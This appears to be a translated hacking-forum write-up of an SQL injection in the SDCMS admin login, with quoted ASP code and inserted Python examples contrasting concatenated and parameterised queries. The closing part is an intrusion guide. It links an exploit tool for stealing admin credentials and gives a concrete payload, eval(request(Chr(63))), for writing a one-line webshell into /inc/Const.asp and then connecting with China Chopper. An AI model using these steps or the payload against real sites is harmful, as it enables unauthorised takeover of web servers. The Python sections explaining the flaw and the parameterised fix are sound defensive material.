Author: T00LS 鬼哥
Vulnerable file: <admin directory>/index.asp

Sub Check
    Dim username,password,code,getcode,Rs
    IF Check_post Then Echo "禁止从外部提交数据!":Exit Sub
    ' username and password both go through FilterText in mode 1
    username=FilterText(Trim(Request.Form("username")),1)
    password=FilterText(Trim(Request.Form("password")),1)
    code=Trim(Request.Form("yzm"))
    getcode=Session("SDCMSCode")
    IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
    IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)":died
    IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)":died
    IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)":died
    IF username="" or password="" Then
        Echo "用户名或密码不能为空":died
    Else
        ' username is spliced straight into the SQL text; only the password is hashed
        Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
        IF Rs.Eof Then
            AddLog username,GetIp,"登录失败",1
            Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
        Else
            Add_Cookies "sdcms_id",Rs(0)
            Add_Cookies "sdcms_name",username
            Add_Cookies "sdcms_pwd",Rs(2)
            Add_Cookies "sdcms_admin",Rs(3)
            Add_Cookies "sdcms_alllever",Rs(4)
            Add_Cookies "sdcms_infolever",Rs(5)
            Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
            AddLog username,GetIp,"登录成功",1
            ' Automatically delete log records older than 30 days
            IF Sdcms_DataType Then
                Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
            Else
                Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
            End IF
            Go("sdcms_index.asp")
        End IF
        Rs.Close
        Set Rs=Nothing
    End IF
End Sub
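The query in Check splices username into the SQL text. The following is an added example, not SDCMS code: it models that same string-building pattern against an in-memory SQLite table shaped like Sd_Admin and puts a bound-parameter version of the same lookup beside it. Table and column names come from the page; the sample row, md5_hex and the helper names (make_db, build_concat_query, login_concat, login_param) are mine.

```python
"""
Added example (not SDCMS code): the page's concatenated login query modelled
over SQLite, next to the parameterised form of the same lookup.
"""
import hashlib
import sqlite3

# Constructed sample admin: the page stores Sdcms_Pwd as md5(password).
SAMPLE_ADMIN = ("admin", "correct horse")


def md5_hex(text: str) -> str:
    """Mirror of the page's md5(password): hex digest of the raw password."""
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def make_db() -> sqlite3.Connection:
    """In-memory table with the column names the page's query selects."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE Sd_Admin (Id INTEGER PRIMARY KEY, Sdcms_Name TEXT, "
        "Sdcms_Pwd TEXT, isadmin INTEGER, alllever TEXT, infolever TEXT)"
    )
    conn.execute(
        "INSERT INTO Sd_Admin VALUES (1, ?, ?, 1, '', '')",
        (SAMPLE_ADMIN[0], md5_hex(SAMPLE_ADMIN[1])),
    )
    return conn


def build_concat_query(username: str, password: str) -> str:
    """The page's pattern: username spliced straight into the SQL text."""
    return (
        "Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin "
        "Where Sdcms_name='" + username + "' And Sdcms_Pwd='" + md5_hex(password) + "'"
    )


def login_concat(conn: sqlite3.Connection, username: str, password: str):
    """Vulnerable form. Returns the matched Id, None for no match, or the string
    'sql-error' when the spliced input broke the statement, which is the proof
    that user-supplied characters reached the SQL parser."""
    try:
        row = conn.execute(build_concat_query(username, password)).fetchone()
    except sqlite3.OperationalError:
        return "sql-error"
    return row[0] if row else None


def login_param(conn: sqlite3.Connection, username: str, password: str):
    """Hardened form: the same lookup with bound parameters, so the username
    can never change the statement's structure."""
    row = conn.execute(
        "Select Id From Sd_Admin Where Sdcms_Name=? And Sdcms_Pwd=?",
        (username, md5_hex(password)),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    # A username containing a single quote: a syntax error in the concatenated
    # form, plain data in the parameterised form.
    print("concat  :", login_concat(db, "o'brien", "x"))
    print("param   :", login_param(db, "o'brien", "x"))
    print("genuine :", login_param(db, *SAMPLE_ADMIN))
```

The single quote in a name such as o'brien is enough to show the difference: the concatenated statement fails to parse, which means whatever follows the quote is interpreted as SQL, while the bound parameter is compared as a value. The fix for classic ASP is the same idea, an ADODB.Command with parameters instead of string splicing.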

We can see that username is filtered through FilterText. Let's look at the FilterText code:

Function FilterText(ByVal t0,ByVal t1)
    IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
    t0=Trim(t0)
    Select Case t1
        Case "1"
            ' Mode 1: strips whitespace only (space, CR, LF)
            t0=Replace(t0,Chr(32),"")
            t0=Replace(t0,Chr(13),"")
            t0=Replace(t0,Chr(10)&Chr(10),"")
            t0=Replace(t0,Chr(10),"")
        Case "2"
            ' Mode 2: strips control characters and punctuation
            t0=Replace(t0,Chr(8),"")    'backspace
            t0=Replace(t0,Chr(9),"")    'tab (horizontal tab)
            t0=Replace(t0,Chr(10),"")   'line feed
            t0=Replace(t0,Chr(11),"")   'vertical tab
            t0=Replace(t0,Chr(12),"")   'form feed
            t0=Replace(t0,Chr(13),"")   'carriage return; chr(13)&chr(10) is the CR+LF pair
            t0=Replace(t0,Chr(22),"")
            t0=Replace(t0,Chr(32),"")   'space
            t0=Replace(t0,Chr(33),"")   '!
            t0=Replace(t0,Chr(34),"")   '"
            t0=Replace(t0,Chr(35),"")   '#
            t0=Replace(t0,Chr(36),"")   '$
            t0=Replace(t0,Chr(37),"")   '%
            t0=Replace(t0,Chr(38),"")   '&
            t0=Replace(t0,Chr(39),"")   ''
            t0=Replace(t0,Chr(40),"")   '(
            t0=Replace(t0,Chr(41),"")   ')
            t0=Replace(t0,Chr(42),"")   '*
            t0=Replace(t0,Chr(43),"")   '+
            t0=Replace(t0,Chr(44),"")   ',
            t0=Replace(t0,Chr(45),"")   '-
            t0=Replace(t0,Chr(46),"")   '.
            t0=Replace(t0,Chr(47),"")   '/
            t0=Replace(t0,Chr(58),"")   ':
            t0=Replace(t0,Chr(59),"")   ';
            t0=Replace(t0,Chr(60),"")   '<
            t0=Replace(t0,Chr(61),"")   '=
            t0=Replace(t0,Chr(62),"")   '>
            t0=Replace(t0,Chr(63),"")   '?
            t0=Replace(t0,Chr(64),"")   '@
            t0=Replace(t0,Chr(91),"")   '[
            t0=Replace(t0,Chr(92),"")   '\
            t0=Replace(t0,Chr(93),"")   ']
            t0=Replace(t0,Chr(94),"")   '^
            t0=Replace(t0,Chr(95),"")   '_
            t0=Replace(t0,Chr(96),"")   '`
            t0=Replace(t0,Chr(123),"")  '{
            t0=Replace(t0,Chr(124),"")  '|
            t0=Replace(t0,Chr(125),"")  '}
            t0=Replace(t0,Chr(126),"")  '~
        Case Else
            ' Default: HTML-entity encoding. The forum rendering collapsed the
            ' entities to the literal characters; the forms below are restored
            ' from that, and the entity used for the apostrophe is assumed.
            t0=Replace(t0, "&", "&amp;")
            t0=Replace(t0, "'", "&#39;")
            t0=Replace(t0, """", "&quot;")
            t0=Replace(t0, "<", "&lt;")
            t0=Replace(t0, ">", "&gt;")
    End Select
    IF Instr(Lcase(t0),"expression")>0 Then
        ' Breaks the CSS "expression" keyword with a soft hyphen (Chr(173));
        ' the original writes that character invisibly inside the literal
        t0=Replace(t0,"expression","e"&Chr(173)&"xpression", 1, -1, 0)
    End If
    FilterText=t0
End Function

See? With the parameter set to 1 it only filters:

    t0=Replace(t0,Chr(32),"")
    t0=Replace(t0,Chr(13),"")
    t0=Replace(t0,Chr(10)&Chr(10),"")
    t0=Replace(t0,Chr(10),"")

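To make the mode difference concrete, here is an added Python port of FilterText (not SDCMS code) that covers both the listing above and the point just made about mode 1: filter_text mirrors the three branches, and surviving_sql_chars reports which SQL-syntax characters each mode lets through. The helper names and the SQL_SYNTAX_CHARS sample are mine, and the entity forms in the default branch are assumed, since the forum rendering collapsed them to the literal characters.

```python
"""
Added example (not SDCMS code): Python port of the page's FilterText, plus a
check of which SQL-syntax characters each mode passes through.
"""

# Chr() codes deleted by mode "2", in the order the VBScript lists them.
MODE2_CODES = [8, 9, 10, 11, 12, 13, 22, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41,
               42, 43, 44, 45, 46, 47, 58, 59, 60, 61, 62, 63, 64, 91, 92, 93,
               94, 95, 96, 123, 124, 125, 126]


def filter_text(t0, t1):
    """Port of FilterText(t0, t1); t1 selects mode 1, mode 2 or the default."""
    if t0 is None or isinstance(t0, (list, tuple)) or len(t0) == 0:
        return ""
    t0 = t0.strip(" ")  # VBScript Trim removes spaces only
    mode = str(t1)
    if mode == "1":
        # Mode 1: whitespace only. Quotes and SQL punctuation survive untouched.
        for ch in (chr(32), chr(13), chr(10) + chr(10), chr(10)):
            t0 = t0.replace(ch, "")
    elif mode == "2":
        # Mode 2: character blacklist.
        for code in MODE2_CODES:
            t0 = t0.replace(chr(code), "")
    else:
        # Default branch: HTML-entity encoding (entity forms assumed, see lead-in).
        t0 = t0.replace("&", "&amp;").replace("'", "&#39;").replace('"', "&quot;")
        t0 = t0.replace("<", "&lt;").replace(">", "&gt;")
    if "expression" in t0.lower():
        # Same trick as the original: a soft hyphen (U+00AD) splits the keyword.
        t0 = t0.replace("expression", "e\u00adxpression")
    return t0


# Constructed sample: characters that matter to SQL string syntax.
SQL_SYNTAX_CHARS = "'\";-#/*="


def surviving_sql_chars(mode):
    """Return the SQL-syntax characters that a given FilterText mode lets through."""
    kept = filter_text(SQL_SYNTAX_CHARS, mode)
    return "".join(c for c in SQL_SYNTAX_CHARS if c in kept)


if __name__ == "__main__":
    for m in (1, 2, 3):
        print(f"mode {m}: survives -> {surviving_sql_chars(m)!r}")
```

Mode 1 returns every one of the sample characters unchanged, which is exactly why the login query is injectable: the single quote that closes the Sdcms_name literal is never touched. Mode 2 strips them all, but it is still a blacklist; the durable fix is to bind the username as a query parameter rather than splice it into the SQL string.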
The vulnerability lets you grab the admin account and password directly. SDCMS's default admin path is /admin/; if the webmaster changed the admin path, find it yourself!

EXP tool download (this tool only runs on XP): sdcms-EXP

Test:

Now enter the CAPTCHA shown in the tool and click OK.

See, we're taken straight into the admin management interface, hehe!

That's it, straight into the backend....

SDCMS privilege escalation:

Method 1: visit /<admin directory>/sdcms_set.asp and append “:eval(request(Chr(63)))’ after the site name (网站名称); that writes a one-line shell straight in. It gets written to /inc/Const.asp, and the one-liner's connection password is ?

OK, now connect with 菜刀 (China Chopper)!